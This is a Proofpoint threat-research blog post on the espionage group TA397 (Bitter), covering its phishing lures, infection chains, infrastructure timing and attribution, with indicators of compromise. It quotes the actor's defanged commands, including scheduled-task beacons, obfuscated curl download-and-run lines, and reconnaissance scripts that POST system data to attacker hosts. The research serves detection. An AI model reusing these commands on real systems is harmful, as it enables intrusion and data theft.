{
	"id": "f605cecb-5bc6-4cb8-a341-ed86c8185af2",
	"created_at": "2026-04-06T00:16:17.499109Z",
	"updated_at": "2026-04-10T03:33:56.939143Z",
	"deleted_at": null,
	"sha1_hash": "731646b712fba1e4210f2dd355a839bd4a31b1ec",
	"title": "The Bitter End: Unraveling Eight Years of Espionage Antics—Part One | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2011592,
	"plain_text": "The Bitter End: Unraveling Eight Years of Espionage Antics—Part One |\r\nProofpoint US\r\nPublished: 2025-06-03 · Archived: 2026-04-02 11:32:18 UTC\r\nJune 04, 2025 Nick Attfield and Konstantin Klinger in collaboration with Threatray’s Abdallah Elshinbary and Jonas\r\nWagner\r\nThis is a two-part blog series, detailing research undertaken in collaboration with Threatray. Part two of this blog series can\r\nbe found on their website here. \r\nAnalyst note: Throughout this blog, researchers have defanged TA397-controlled indicators and modified certain technical\r\ndetails to protect investigation methods. \r\nKey findings \r\nProofpoint Threat Research assesses it is highly likely that TA397 is a state-backed threat actor tasked with\r\nintelligence gathering in the interests of the Indian state. \r\nThe group frequently experiments with their delivery methods to load scheduled tasks. However, the resulting\r\nscheduled tasks, PHP URL patterns, inclusion of a victim’s computer name and username in the beaconing, and Let’s\r\nEncrypt certificates on attacker servers provide a high confidence fingerprint of detecting the group’s activity.  \r\nTA397 will frequently target organizations and entities in Europe that have interests or a presence in China, Pakistan,\r\nand other neighboring countries on the Indian subcontinent.  \r\nTA397’s hands-on-keyboard and infrastructure operations align with the standard working hours of the Indian\r\nStandard Time (IST) timezone.  \r\nOverview \r\nTA397 (Bitter) is an espionage group with a long history of targeting South Asian entities. While the group is frequently\r\nattributed to India (non-publicly), the reasoning behind this is not clearly documented. In this blog we share evidence\r\nshowing TA397 to be an India-aligned threat actor and release previously undisclosed evidence of the group’s targeting\r\noutside of Asia. 
In part one of this blog series, we explore TA397’s campaigns, targeting, and payload delivery and conduct an in-depth analysis of TA397’s infrastructure. Part two of this blog series expands on this research with a deep dive into TA397’s entire observed malware arsenal, highlighting how the group’s capabilities support its espionage operations. Our joint research with the Threatray research team aims to substantiate the claim that TA397 is an espionage-focused, state-backed threat actor, tasked with intelligence gathering in the interests of the Indian state.\r\nTA397’s Operations\r\nThis section covers some of the campaigns observed by Proofpoint Threat Research from October 2024 to April 2025 that we have attributed to TA397. Campaigns referenced throughout part one of this blog fall within this timeframe. This section covers the group’s targeting, the types of email accounts used to deliver phishing emails, the subjects employed to blend in with legitimate traffic, the lures crafted to entice targets to engage with attachments or links, and finally the infection chains TA397 used to deploy malicious payloads on targets of interest.\r\nProofpoint Threat Research also has unique insight into what hands-on-keyboard activity looks like from the group. The data presented in this blog provides a new lens through which to analyze victimology and highlights the fact that the group has a much wider pool of collection targets than previously documented.\r\nCampaigns, victimology, and lures\r\nhttps://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one\r\nPage 1 of 17\r\nTracking and analyzing TA397’s activity over an extended period surfaces several observable behavioral patterns displayed by the group. These patterns provide threat researchers with many opportunities to monitor and detect TA397’s activity.
\r\nProofpoint has observed TA397 frequently targeting an exceedingly small subset of targets. Geographically, this targeting is also almost exclusively observed against European entities with links to China or India’s neighbors, with some targeting also observed in China and South America. While this is likely more indicative of visibility bias, most public reporting on the group details TA397’s activities against organizations in Asia.\r\nThe TA397 targeting verticals we have observed are also highly characteristic of espionage-focused threat actors. Governments, diplomatic entities, and defense organizations are frequently targeted to enable intelligence collection on foreign policy or current affairs, in addition to providing threat actors potential insight into a government’s position or decision-making process on political issues, trade negotiations, defense contracts, or wider economic investments. When analyzing targeting and attributing clusters of threat activity, the topics and themes will almost certainly map onto the geopolitical, economic, or military interests of the threat actor’s suspected country of origin. The targets, subjects, and lures of TA397’s campaigns exhibit these same qualities, which are consistent with activity that is in the intelligence interests of the Indian state.\r\nTA397 uses a swathe of different email accounts to carry out its operations. The group has shifted between freemail providers – 163[.]com, 126[.]com, and ProtonMail – and various compromised accounts belonging to the governments of Pakistan, Bangladesh, and Madagascar. Within these campaigns, TA397 has been seen masquerading as or spoofing various entities within the Chinese government, the Embassy of Mauritius in China, the Embassy of Madagascar in China, the Ministry of Foreign Affairs of the Republic of Korea, and the Foreign Affairs Office in Beijing, to name a few.
The subject lines employed alongside TA397’s sender accounts provide insight into topics, themes, and events specific to either the group’s or the targets’ interests. Some of the subjects that Proofpoint has observed in TA397’s campaigns are shown below:\r\nAUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS AT THE LEVEL OF EXTERNAL REPRESENTATIONS\r\nPUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR\r\nSituationNote : SouthKorea_Martial law Seoul Embassy Advisory\r\nInvitation Embassy of the Islamic Republic of Pakistan Beijing Dec 2024.\r\nEU Delegation\r\nKey National Defense R\u0026D Projects\r\nNote from Embassy of Mauritius 13 December 2024\r\nFw:Fw:CN_5896_File_vers1\r\nFw: A/c Records : Beijing\r\nFw: Preferential Visa Rules Updates 2025\r\nProtocol Guidelines for Diplomatic Missions\r\nDepartment of Northeast Asia, Ministry of Foreign Affairs\r\nInvitation Armed Forces Day\r\nRe: Intermediate structure WA's\r\nMinistry of Commerce File\r\nEspionage-focused threat actors frequently operate in the realm of politics, diplomacy, trade, investment, and defense. Based on Proofpoint’s visibility of the group’s activity, TA397 is no different. As shown above, some subjects purportedly discuss matters relevant to European organizations involved in diplomacy. There are also many subject lines pertaining to diplomatic or military issues in China, Pakistan, and Northeast Asia. One campaign aligned with the timing of the crisis in December 2024 when South Korea’s president instituted martial law; its subject – “SituationNote : SouthKorea_Martial law Seoul Embassy Advisory” – clearly demonstrates how threat actors attempt to blend in with legitimate email traffic by leveraging topical themes and content the target is likely to read or see in their inbox.\r\nThere are two campaigns that are particularly interesting given TA397’s suspected attribution.
The campaigns with the subjects “PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR” and “Note from Embassy of Mauritius 13 December 2024” both show TA397 attempting to appear as if the emails were legitimately from the Malagasy and Mauritian embassies respectively (despite using a Chinese freemail address in the campaign where the sender claimed to be the Mauritian embassy in China).\r\nExample TA397 lure email containing a RAR-enclosed CHM attachment.\r\nThis targeting may reflect that both Madagascar and Mauritius are strategic partners of India, with relationships spanning across trade, energy, infrastructure, and more. Furthermore, from early 2024 into 2025, India has engaged in “joint naval exercises, coordinated patrols, information sharing, HADR efforts, capacity building and other diplomatic engagements” with both Madagascar and Mauritius on multiple occasions. Based on the content and the decoy documents employed, it is clear that TA397 has no qualms with masquerading as other countries’ governments, including Indian allies. While TA397’s targets in these campaigns were Turkish and Chinese entities with a presence in Europe, it signals that the group likely has knowledge and visibility into the legitimate affairs of Madagascar and Mauritius and uses the material in spearphishing operations.\r\nMany espionage-focused threat actors send decoy documents or accompanying files alongside initial access payloads or links to mislead targets and convince them of the legitimacy of the email. Over the last year, however, Proofpoint has only observed TA397 doing this in two instances: in a previously published campaign targeting an organization in the Turkish defense sector, and in a campaign targeting European entities located in China.
\r\nFalse document lure to add legitimacy to phishing email containing a malicious attachment.\r\nThe rest of the campaigns TA397 has carried out simply contained plain-text body messages in which the group masqueraded as a legitimate government organization, with an accompanying malicious attachment or URL. This choice demonstrates an overall lack of maturity in the group’s phishing operations compared to many other state-backed threat actors.\r\nInfection chain\r\nTA397 may not display advanced capabilities, but the group is highly active, carrying out frequent and consistent campaigns. While the group has a “tried and true” methodology that it always seems to fall back on, TA397 has also demonstrated an ability to experiment with novel infection chains to bypass detections or exploit vulnerabilities.\r\nInitial access\r\nSpearphishing emails remain TA397’s preferred technique for initial access, and to date, we are not aware of any reports indicating the use of alternative methods by this group. That said, the group’s spearphishing tactics have evolved and demonstrate a degree of flexibility. While in 2019/2020 TA397 relied on exploiting CVEs, used ArtraDownloader to deploy additional payloads, and even experimented with Android malware, the group has consistently shown a preference for scheduled tasks in recent years, as reported by Proofpoint, Ahnlab, StrikeReady Labs, Cisco Talos, and others. In historical operations, ArtraDownloader encoded both the username and the computer name of the infected machine within the HTTP(S) POST C2 beacon. This data was sent to the C2 server on a regular basis, presumably allowing the actor to manually assess whether the victim met certain targeting criteria and, if so, deliver a second-stage payload.
TA397 continues to follow the same approach today using scheduled tasks (detailed below).\r\nThe emails in the campaigns we observed typically contained either a direct attachment or a URL that leveraged a legitimate file-sharing service to deliver a file, which then launched a scheduled task. Even when a file was directly attached to the email, it ultimately resulted in the creation of a scheduled task. In some cases, the file was packaged within an archive before execution as the actors experimented with more advanced techniques.\r\nFor example, in late 2024, shortly after its use of alternate data streams in NTFS file systems, Proofpoint observed TA397 using an esoteric file type: Microsoft Search Connector (MSC) files, which allow users to connect with data stored in web services or remote storage locations. This was a new tactic for the group to drop and launch LNK files on the infected machine and create scheduled tasks. We cover this chain in more detail below, including the follow-on hands-on-keyboard activity. These search connectors are Microsoft XML files and are abused in a similar way to library files or saved search files. Abusing WebDAV for payload downloads has become a trend with various groups in the threat landscape over the past years. This specific search connector technique was reported to be a security risk in 2023, but the first observed use by TA397 was in late 2024.\r\nAnother esoteric file type was observed in a TA397 campaign in late 2024. The emails contained a RAR archive with an MSC file inside. If double-clicked and run by the user, the MSC started mmc.exe, which set up a scheduled task that attempts to use PowerShell to download and run the next-stage payload.
In this campaign, TA397 exploited CVE-2024-43572, otherwise known as GrimResource, a vulnerability that provides attackers remote code execution in the context of mmc.exe on targeted endpoints. This vulnerability was first publicly reported in June 2024, and Threat Research first observed TA397 using this file type in October 2024.\r\nOver a period of years, TA397 has experimented with various methods for dropping or creating a scheduled task. However, the scheduled task itself remains largely unchanged, which we highlight in the next section. Among the file types used to initiate scheduled tasks via cmd.exe or PowerShell are MSC, LNK, CHM, MS Access, IQY files, and others.\r\nSince Proofpoint began tracking TA397 in 2021, we have not observed the group using zero-day vulnerabilities or techniques that haven’t already been publicly disclosed or reported. The group likely also monitors the threat landscape and follows a “tried and true” approach with initial access payloads, using whatever proves effective. The group maintains consistency in the scheduled task method but tends to vary when it comes to the final payload (see later chapters).\r\nThe graphic below provides a general overview of the initial access infection chains observed:\r\nOverview of TA397’s infection chains.\r\nScheduled tasks\r\nThe following example of a scheduled task command line shows how the task beaconed every 16 minutes to the staging domain woodstocktutors[.]com, awaiting instructions to retrieve the next-stage payload. When these samples were executed in a sandbox environment, no additional payloads were delivered. However, when allowed to run for a longer period, a next-stage payload was eventually dropped. This behavior appeared to be manual, likely triggered by the actor after evaluating certain selection criteria – such as the victim’s IP address, computer name, and username, which were sent to the server via the beacon.
\r\n\"C:\\\\Windows\\\\System32\\\\conhost.exe\" --headless cmd /c ping localhost \u003e nul \u0026 schtasks /create /tn \"EdgeTaskUI\" /f /sc minute /mo 16 /tr \"conhost --headless powershell -WindowStyle Minimized irm \"woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME\" -OutFile \"C:\\\\Users\\\\public\\\\kwe.cc\"; Get-Content \"C:\\\\Users\\\\public\\\\kwe.cc\" | cmd\"\r\nThe group experimented with various PowerShell and command-line tools (e.g. curl, conhost, etc.) and obfuscation methods, but the core functionality remained consistent. Below is another example featuring an obfuscated PowerShell command that created a scheduled task beaconing every 18 minutes to princecleanit[.]com:\r\nschtasks /create /tn \\\\\"Task-S-1-5-42121\\\\\" /f /sc minute /mo 18 /tr \\\\\"conhost --headless cmd /v:on /c set gz=ht\u0026 set gtz=tps:\u0026 set 7gg=!gz!!gtz!\u0026 set 6hg=!7gg!//p^rin^ce^cle^anit.co^m\u0026 c^ur^l !6hg!/d^prin.p^hp?dr=%computername%;%username%|c^m^d\\\\\"\r\nAs part of our ongoing tracking of the group, Proofpoint Threat Research identified a signature for TA397 when creating scheduled tasks. The way the group structured PHP URI requests to staging infrastructure with a combination of computer name and username, with varying characters between them, may have been an effort to throw off static detections. This has been consistent for years, as shown by the examples below observed in historical TA397 campaigns.
\r\nblucollinsoutien[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME\r\nhxxp://46.229.55[.]63/svch.php?li=%computername%..%username%\r\nhxxp://95.169.180[.]122/vbgf.php?mo=%computername%--%username%\r\nhxxp://inizdesignstudio[.]com/lk.php?xm=$env:computername*$env:username\r\nhxxp://trkswqsservice[.]com/turf.php?xm=$env:COMPUTERNAME*$env:USERNAME\r\nhxxp://woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME\r\nhxxps://princecleanit[.]com/dprin.php?dr=%computername%;%username%\r\nhxxps://utizviewstation[.]com/dows.php?cb=$env:COMPUTERNAME*$env:USERNAME\r\nhxxps://www[.]headntale[.]com/lchr.php?ach=%computername:~0,15%_%username:~0,5%\r\nhxxps://www.mnemautoregsvc[.]com/GIZMO/flkr.php?sa=COMPUTERNAME**USERNAME\r\njacknwoods[.]com/jacds.php?jin=%computername%_%username%\r\nutizviewstation[.]com/sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME\r\nwarsanservices[.]com/mydown.php?dnc=%username%_%computername%\r\nwarsanservices[.]com/myupload.php?dnc=%username%_%computername%\r\nInspection of the TLS certificates used by these staging domains revealed that most of them relied on standard Let’s Encrypt certificates. We performed a timestamp analysis on these certificates, as detailed in the infrastructure analysis section. Here is an example for the princecleanit[.]com staging domain:\r\nprincecleanit[.]com TLS certificate from Censys.\r\nTypical characteristics:\r\nSubject DN: CN=*.\u003cdomain\u003e\r\nIssuer DN: C=US, O=Let’s Encrypt, CN=R[0-9]+\r\nValidity Period: 90 days\r\nThese present detection opportunities for the initial access techniques of this actor: the consistent use of scheduled tasks, the specific PHP URL pattern, the inclusion of the victim’s computer name and username in the beacon, and the presence of a Let’s Encrypt certificate on the server side.
Collectively these form a high-confidence fingerprint and strongly suggest the activity is attributable to TA397.\r\nFingerprint of TA397’s scheduled tasks and infrastructure.\r\nHands-on-keyboard activity\r\nDuring our research, we observed TA397 engaging in hands-on-keyboard activity. Specifically, the group dropped a RAT, followed shortly by a second one. It is highly likely this was direct manual activity by the actor during a traditional work schedule in India.\r\nAs covered in Proofpoint’s previous blog on TA397, where we detailed the manual deployment of wmRAT and MiyaRAT, we have since observed TA397 engaging in hands-on-keyboard activity in two distinct campaigns targeting government organizations.\r\nThe first case was the previously highlighted campaign using the search connector file format, in which the group used this novel technique to drop an LNK file that would load a scheduled task on a target machine.\r\n\"C:\\\\Windows\\\\System32\\\\cmd.exe\" /start min /c schtasks /create /tn \"OneDrive\\\\OneDrive Standalone Update Task-S-1-5-21-9920643986-2299988379\" /f /sc minute /mo 19 /tr \"conhost --headless cmd /v:on /c set 765=ht\u0026 set 665=tp:\u0026 set 565=!765!!665!\u0026 set 465=!565!//46.229.55[.]63\u0026 curl !465!/sv^c^h.p^h^p?li=%computername%..%hostname%c^m^d\"\u0026 msg * \"ERROR 0XA008CE : ERROR reading File, contents are corrupted.\"\r\nThis LNK file used cmd.exe to set up a scheduled task named “OneDrive\\\\OneDrive Standalone Update Task-S-1-5-21-9920643986-2299988379”, which attempted to use conhost.exe to download and run the next-stage payload every 19 minutes. To do so, the scheduled task created a curl request to hxxp://46.229.55[.]63/svch[.]php?li=%computername%..%username% providing details of the affected target machine.
It also displayed a decoy error message to the user saying that the original file cannot be viewed.\r\nThis scheduled task was left beaconing for 18 hours until Proofpoint first observed a response from TA397 at 05:27 UTC (10:57 IST):\r\nHTTP/1.1 200 OK\r\nDate: Thu, 05 Dec 2024 05:27:59 GMT\r\nServer: Apache/2.4.62 (Ubuntu)\r\nContent-Length: 330\r\nContent-Type: image/jpeg\r\nCache-Control: no-cache\r\n\r\ncd C:\\\\programdata\r\ndir \u003e abc1.pdf\r\ntasklist \u003e\u003e abc1.pdf\r\nwmic /namespace:\\\\\\\\root\\\\SecurityCenter2 path AntiVirusProduct get \u003e\u003eabc1.pdf\r\nwmic logicaldisk get caption \u003e\u003e abc1.pdf\r\nsysteminfo \u003e\u003e C:\\\\programdata\\\\abc1.pdf\r\ncurl -X POST -F \"file=@C:\\\\programdata\\\\abc1.pdf\" \u003chxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%usernam\r\ndel abc1.pdf\r\nThis enumeration was essentially identical to the one that Proofpoint detailed in our previous blogpost on TA397, with the addition of the systeminfo command.
The actor then issued a POST request with this target machine information to a different PHP endpoint on the staging domain: /svupfl[.]php?oi=%computername%_%username%.\r\nEighteen minutes later, we observed this request:\r\nHTTP/1.1 200 OK\r\nDate: Thu, 05 Dec 2024 05:46:59 GMT\r\nServer: Apache/2.4.62 (Ubuntu)\r\nContent-Length: 381\r\nContent-Type: image/jpeg\r\nCache-Control: no-cache\r\n\r\ncd C:\\\\programdata\r\nset /P =\"MZ\" \u003c nul \u003e\u003e sh1.txt\"\r\ncurl -o sh2.txt \u003chxxp://173.254.204[.]72/sh2.txt\u003e\r\ncopy /b sh1.txt+sh2.txt shh.exe\r\ncurl -o dune64.log \u003chttp://173.254.204[.]72/dune64.log\u003e\r\nren dune64.log dune64.bin\r\nshh.exe dune64.bin\r\ndir \u003e abc1.pdf\r\ntasklist \u003e\u003e abc1.pdf\r\ncurl -X POST -F \"file=@C:\\\\programdata\\\\abc1.pdf\" \u003chxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%usernam\r\ndel abc1.pdf\r\nIn this case, TA397 operators made an error by issuing a curl command that attempted to retrieve a payload from hxxp://173.254.204[.]72/dune64.log. However, this request returned a 404 error as the attackers had not placed a file with that name on their server, making the rename command and the execution of shh.exe fail. Instead, it turned out that the next stage was present under /dune64.bin. When Proofpoint analysts executed the shh.exe payload alongside the dune64.bin binary, the full chain executed correctly. Analysis of these payloads allowed us to identify shh.exe as KugelBlitz and dune64.bin as the Demon agent from the Havoc C2 framework. This variant was found to be communicating with 72.18.215[.]108 over port 443.
\r\nAfter the actor’s initial attempt to load the backdoor failed, we observed another request at 08:57 UTC (14:27 IST):\r\nHTTP/1.1 200 OK\r\nDate: Thu, 05 Dec 2024 08:57:00 GMT\r\nServer: Apache/2.4.62 (Ubuntu)\r\nContent-Length: 263\r\nContent-Type: image/jpeg\r\nCache-Control: no-cache\r\n\r\ncd C:\\\\programdata\r\nnet use Z: \\\\\\\\72.18.215[.]1\\\\tempy\r\nZ:\r\nZ:\\\\shl.exe dune64.bin\r\nC:\r\nnet use /delete Z: /y\r\nwhoami\r\ndir \u003e abc1.pdf\r\ntasklist \u003e\u003e abc1.pdf\r\ncurl -X POST -F \"file=@C:\\\\programdata\\\\abc1.pdf\" \u003chxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%usernam\r\ndel abc1.pdf\r\nIn this case, TA397 attempted to execute the same chain as three hours prior, this time opting to pull the full payloads from a separate actor-controlled server by mounting an SMB share called tempy. By enumerating this share, Proofpoint was able to identify that TA397 was also storing wmRAT and MiyaRAT payloads on the drive, the exact same binaries we blogged about in December 2024. Furthermore, within TA397’s drive, Proofpoint found two documents that may have been exfiltrated from victims.\r\nThe first document was a scanned copy of an official government tax document from Bangladesh. We have redacted this information from the blog for anonymity and safety purposes. The second was a strategic military document and appeared to originate from a military organization of Bangladesh. For these reasons, we have elected to omit it from this publication. These documents both appeared to be photocopies or scans of handwritten documents. Both documents are likely legitimate, and it is highly likely they were exfiltrated from TA397 victims.
This targeting is consistent with TA397’s historical activity and reinforces that both organizations are regular collection targets for TA397’s espionage activities.\r\nThe second case of hands-on-keyboard activity Proofpoint observed was in a more common infection chain for the group using CHM files.\r\nThe email appeared to be a thread with another recipient to make the attachment appear more legitimate. The email contained a RAR-compressed CHM file. If double-clicked and run by the user, the CHM set up a MSTaskUI scheduled task that attempted to use PowerShell through conhost.exe to download and run the next-stage payload every 16 minutes with the curl utility.\r\n\"C:\\\\Windows\\\\System32\\\\conhost.exe\" --headless cmd /c ping localhost \u003e nul \u0026 schtasks /create /tn \"MSTaskUI\" /f /sc minute /mo 16 /tr \"conhost --headless powershell -WindowStyle Minimized irm \"utizviewstation[.]com/sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME\" -OutFile \"C:\\\\Users\\\\public\\\\documents\\\\vfc.cc\"; Get-Content \"C:\\\\Users\\\\public\\\\documents\\\\vfc.cc\" | cmd\"\r\nProofpoint observed TA397 operators respond to these ongoing scheduled task requests with manual commands at 10:40 UTC (16:20 IST), issuing a command that enumerated the target machine and sent a POST request containing that information.
\r\ntree \"%userprofile%\\\\Desktop\" /f \u003e C:\\\\Users\\\\Public\\\\Documents\\\\d.log\r\nsysteminfo \u003e\u003e C:\\\\Users\\\\Public\\\\Documents\\\\d.log\r\nWMIC /Node:localhost /Namespace:\\\\\\\\root\\\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /\r\nwmic logicaldisk get name \u003e\u003e C:\\\\Users\\\\Public\\\\Documents\\\\d.log\r\ncd C:\\\\Users\\\\Public\\\\Documents\r\ncurl -X POST -F \"file=@d.log\" hxxps://www.utizviewstation[.]com/urf.php?mn=%computername%\r\ndel d.log\r\nSimilar to previously observed hands-on-keyboard activity from the group, the POST request containing the infected machine’s information was directed to the same staging domain, but to a different PHP URI, /urf.php?mn=%computername%, than the scheduled task. Proofpoint has observed TA397 refraining from dropping next-stage payloads depending on the system information provided by the infected machine. It is likely that the computer name and information sent to the staging domain within the scheduled tasks undergo some form of pre-filtering. This selection criterion is similar to what was reported regarding the earlier use of ArtraDownloader. This is also likely why the actors remained consistent in their use of scheduled tasks while varying their initial access methods and final payloads. Their selection criteria are a crucial part of their overall process and indicative of the highly targeted nature of espionage.
\r\nAt 13:37 UTC (19:07 IST) we observed this response from the attacker server:\r\ncurl -o C:\\\\ProgramData\\\\msuitl.tar hxxp://utizviewstation[.]com/msuitl.tar\r\ncd C:\\\\ProgramData\r\ntar -xvf msuitl.tar\r\ndir \u003e t0.log\r\nmsuitl.exe\r\ntasklist \u003e\u003e t0.log\r\ncurl -X POST -F \"file=@t0.log\" hxxps://www.utizviewstation[.]com/urf.php?mn=%username%\r\ndel t0.log\r\nThis issued a request to the /msuitl.tar endpoint on the domain, dropping the final payload:\r\nHTTP/1.1 200 OK\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=100\r\ncontent-type: application/x-tar\r\nlast-modified: Mon, 03 Feb 2025 11:23:10 GMT\r\naccept-ranges: bytes\r\ncontent-length: 45568\r\ndate: Mon, 03 Feb 2025 13:37:21 GMT\r\nserver: LiteSpeed\r\nCache-Control: no-cache\r\n\r\nmsuitl.exe\r\nAs seen from the response headers, the endpoint was modified 43 minutes after the initial enumeration of the infected machine, suggesting TA397 made a conscious decision to load a hand-picked payload to the staging infrastructure. It is likely this payload selection is directly correlated to target selection and information gleaned from initial enumeration. The final payload of this campaign turned out to be BDarkRAT, which is covered in part two of this post on Threatray’s blog.\r\nWhile TA397’s initial access vector has consistently been spearphishing emails and the first part(s) of the group’s intrusion chains have varied between a handful of techniques, the breadth of malware payloads the group has been observed deploying is significant.\r\nThe following image plots the timestamps of our observed hands-on-keyboard activity over a Monday-to-Friday working-hours schedule in Indian Standard Time (IST):\r\nHeatmap of observed hands-on-keyboard activity timestamps.
\r\nInfrastructure analysis\r\nTimezone analysis has proven to be a successful method for attributing espionage groups—not only for Asian espionage groups in general, but also specifically for TA397, as demonstrated by Bitdefender in 2020 and during our observations of hands-on-keyboard activity. In the Bitdefender research, analysis of the creation timestamps of code-signing certificates used in TA397 malware, as well as ZIP file timestamps for samples, revealed that they mapped to Indian Standard Time (UTC+5:30) and followed a 9-to-5, Monday-to-Friday working schedule.\r\nFor this research, we collected 122 known TA397 C2 and staging domains from internal telemetry, pivoting, and public reports, spanning several years since the group was first publicly reported. For each domain (when available), we gathered the following three timestamps:\r\nPassive DNS first seen timestamp;\r\nDomain creation timestamp from WHOIS data;\r\nTLS certificate creation timestamp from Let’s Encrypt certificate.\r\nExample data:\r\nDomain | Campaign date | Passive DNS | WHOIS | Certificate | Staging URL\r\nblucollinsoutien[.]com | 2025-04-01 | 2025-03-11 13:09:43 IST | 2025-03-11 13:06:44 IST | 2025-03-11 13:08:45 IST | /jbc.php?fv=$env:COMPUTERNAME*$env:USERNAM\r\nprincecleanit[.]com | 2025-03-26 | 2025-01-03 14:16:21 IST | 2025-01-02 15:27:04 IST | 2025-01-02 15:30:00 IST | /dprin.php?dr=COMPUTERNAME;USERNAM\r\nAfter converting all timestamps to Indian Standard Time (IST), we generated three separate heatmaps—one for each data source.
For better visualization, the standard “working hours” are marked with dotted lines. The data largely aligns with this pattern or at least suggests a clear trend. \r\nPassive DNS: \r\nHeatmap of Passive DNS first seen timestamps. \r\nSince there can be a delay between domain registration and the first seen timestamp recorded in passive DNS databases for a variety of reasons, the presence of outliers is not unexpected. \r\nWHOIS: \r\nHeatmap of WHOIS domain registration timestamps. \r\nWHOIS data provides information about domain registrations. For this research, we queried the WHOIS database directly. Since we are working with historical data, the domain creation date was not always available for every domain included in the study (e.g. removed from the database following domain expiry). The data shows that “lunch hour” on Friday stands out, as the actor registered multiple domains within minutes of each other on the same day. Logically, this suggests that a member of the infrastructure team likely registered several domains in a single “session” rather than just one at a time. \r\nCertificate: \r\nHeatmap of Let’s Encrypt certificate valid from timestamps. \r\nFor this research, we used Censys to locate the TLS certificates associated with each domain and queried the certificate creation timestamp. We only included data points where a Let’s Encrypt certificate was used, as this has previously been identified as an indicator of this group’s infrastructure. One of the challenges we faced was that some of the historical C2 and staging domains were no longer active – either expired or re-registered – so selecting the correct Let’s Encrypt certificate was critical to ensure accurate analysis. 
Some registrars and providers offer services that automatically renew expired certificates or issue a TLS certificate upon domain registration. The domains analyzed in this research span a variety of hosting providers. \r\nCombining all data sources into a single heatmap yields the following result: \r\nCombined heatmap of Passive DNS, WHOIS and certificate timestamps. \r\nThere is a visible variation between domain creation and TLS certificate issuance. Below are two example data points – one for a C2 domain and one for a staging domain – where the domain was registered several days before the corresponding TLS certificate was issued. The associated campaign activity began several days after that. All timestamps align with Indian Standard Time, and there is a clear indication that most infrastructure-related activity occurs during standard business hours in that timezone. \r\nDomain | Passive DNS | WHOIS | Certificate | Source / Campaign \r\nutizviewstation[.]com | 2025-01-03 17:04:43 IST | 2025-01-03 14:31:26 IST | 2025-01-06 16:16:55 IST | First seen in Campaign data: 2025-02-03, Staging URL: /sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME \r\nottawadesignlab[.]com | 2024-08-25 16:23:26 IST | 2024-08-23 12:23:49 IST | 2024-09-27 12:32:13 IST | Mentioned as C2 in https://www.ctfiot.com/211062.html \r\nAttribution \r\nAttribution of state-backed espionage activity has always been a challenge. However, by analyzing the confluence of multiple signals across various aspects of an actor’s operations, we can make assessments as to the motives and origins of observed activity. 
\r\nTA397 is an espionage-focused threat actor that highly likely operates on behalf of an Indian intelligence organization. Based on our telemetry, TA397 primarily targets government and defense organizations in Asia and Europe, with a particular focus on entities with relations or interests in China, Pakistan, and other neighboring countries on the Indian subcontinent. \r\nMasquerading as foreign offices, embassies, and government entities of Madagascar, Mauritius and more indicates that TA397 not only has knowledge of legitimate affairs of those countries, but leverages this knowledge to bolster the legitimacy of its spearphishing operations. Moreover, the use of legitimate or spoofed decoy documents, subject lines, and body contents pertaining to internal or foreign government affairs demonstrates that TA397 is very familiar with the standard practices of government. Possession of what are likely legitimate internal documents issued by the Bangladeshi military and tax authorities is highly consistent with the assessment that TA397 carries out intelligence-based tasking for Indian state interests. \r\nOur observations of hands-on-keyboard activity engagements showed TA397’s responses beginning at 05:27 UTC following hours of dormant scheduled task beaconing in the first observed case, with follow-up activity observed at 05:46 UTC and 08:57 UTC. In the second case, activity began at 10:40 UTC. Modifications on TA397’s server were observed at 11:27 UTC with final follow-up payload delivery at 13:37 UTC. This aligns with public assessments that TA397 is a threat actor of South Asian origin, if adjusted to Indian Standard Time or similar timezones. In addition, our analysis of TA397’s sprawling infrastructure demonstrates the operational patterns the group follows. 
There is a clear indication that most infrastructure-related activity occurs during standard business hours in the IST timezone. \r\nAs covered in part two of this blog series with Threatray, there is also overlap of tooling with other known Indian threat actors, Mysterious Elephant/APT-K-47 and Confucius, through the use of ORPCBackdoor. This strongly suggests that TA397 is part of a tool sharing ecosystem among Indian state-backed actors. However, more research is needed to determine whether these groups operate with access to a central “quartermaster” – development resources that are either internal or external to the organizations they belong to. \r\nIndicators \r\nIndicator | Type | Description | First Seen \r\nmnemautoregsvc[.]com | Domain | Staging domain | October 2024 \r\njacknwoods[.]com | Domain | Staging domain | November 2024 \r\n1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1 | SHA256 | LNK scheduled task loader | December 2024 \r\n7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67 | SHA256 | CHM scheduled task loader | December 2024 \r\nb56385dc93cc8f317ce499539b0d52aa0b3d8b6a8f9493e1ee7ba01765edd020 | SHA256 | LNK scheduled task loader | December 2024 \r\nhxxp://46[.]229[.]55[.]63/svch.php?li=%computername%[.][.]%username% | URL | Payload delivery | December 2024 \r\nhxxp://95[.]169[.]180[.]122/vbgf.php?mo=%computername%--%username% | URL | Payload delivery | December 2024 \r\ninizdesignstudio[.]com | Domain | Staging domain | December 2024 \r\ntrkswqsservice[.]com | Domain | Staging domain | January 2025 \r\n80b3a71138c34474725bbb177d8dec078effb7d8f4b19bf2e7a881b01ec7d323 | SHA256 | CHM scheduled task loader | January 2025 
